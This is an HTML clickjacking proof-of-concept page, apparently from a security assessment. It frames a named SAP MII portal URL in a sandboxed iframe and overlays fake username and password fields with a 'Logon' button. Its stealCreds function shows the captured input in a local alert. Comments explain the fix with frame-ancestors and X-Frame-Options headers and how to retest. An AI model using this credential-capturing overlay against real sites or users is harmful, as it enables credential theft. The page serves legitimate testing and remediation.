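<!doctype html>
<!--
  Clickjacking (UI redress) proof of concept.

  The page loads the application under test in an <iframe> and draws three
  controls of its own (two inputs and a button) on top of the frame, using
  absolute positioning and a higher z-index. Anything typed into those
  controls is handled by this page, never by the framed application.

  What a finding based on this page shows: the framed URL can be rendered
  inside a page from another origin. The frame stays blank when the
  application's responses forbid framing, so the fix belongs on the server:
    - Content-Security-Policy: frame-ancestors 'none'   (or 'self')
    - X-Frame-Options: DENY   (or SAMEORIGIN), for older browsers
  Retest by reloading this page after the headers are deployed; the browser
  should refuse to display the frame.
-->
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Clickjacking PoC</title>
  <style>
    /* Framed application: the lower layer (z-index 1). */
    iframe {
      position: relative;
      width: 1000px;
      height: 750px;
      z-index: 1;
    }

    /*
      Overlay controls: the upper layer (z-index 2). The pixel offsets are
      hard-coded, so they line up with the framed page only for the layout
      they were measured against.
    */
    #div_uname {
      position: absolute;
      top: 245px;
      left: 544px;
      z-index: 2;
    }

    #div_pwd {
      position: absolute;
      top: 268px;
      left: 544px;
      z-index: 2;
    }

    #div_btn {
      position: absolute;
      top: 310px;
      left: 660px;
      z-index: 2;
    }

    #div_btn button {
      font-size: 16px;
    }
  </style>
</head>
<body>
  <script>
    // Reads the two overlay inputs and shows their values in a local alert().
    // Nothing is sent anywhere; the dialog is the evidence that input meant
    // for the framed page was captured by the embedding page instead.
    function stealCreds() {
      var uname = document.getElementById("username").value;
      var pwd = document.getElementById("password").value;
      alert("Username: " + uname + "\nPassword: " + pwd + "\n\nYou were successfully clickjacked!!");
    }
  </script>

  <div id="div_uname">
    <input type="text" id="username">
  </div>
  <div id="div_pwd">
    <input type="password" id="password">
  </div>
  <div id="div_btn">
    <!-- type="button": there is no enclosing form, so nothing is submitted. -->
    <button type="button" onclick="stealCreds()">Logon</button>
  </div>

  <!--
    sandbox="allow-scripts" lets the framed document run script but, with no
    allow-top-navigation token, prevents it from navigating the top-level
    window. A JavaScript frame-busting snippet in the application would
    therefore not be a reliable defence here; the response headers listed at
    the top of this file are. Without allow-same-origin the framed document
    also runs in an opaque origin, so it may not behave exactly as it does
    when opened directly.

    The width/height attributes are overridden by the iframe rule in the
    stylesheet (1000px by 750px); they are kept as the author wrote them.
  -->
  <iframe src="https://sapbm37.sl1694667.sl.edst.ibm.com:50101/XMII/CM/ConnectedPlant/Portal.html" height="730" width="1250" sandbox="allow-scripts" title="Application under test"></iframe>
</body>
</html>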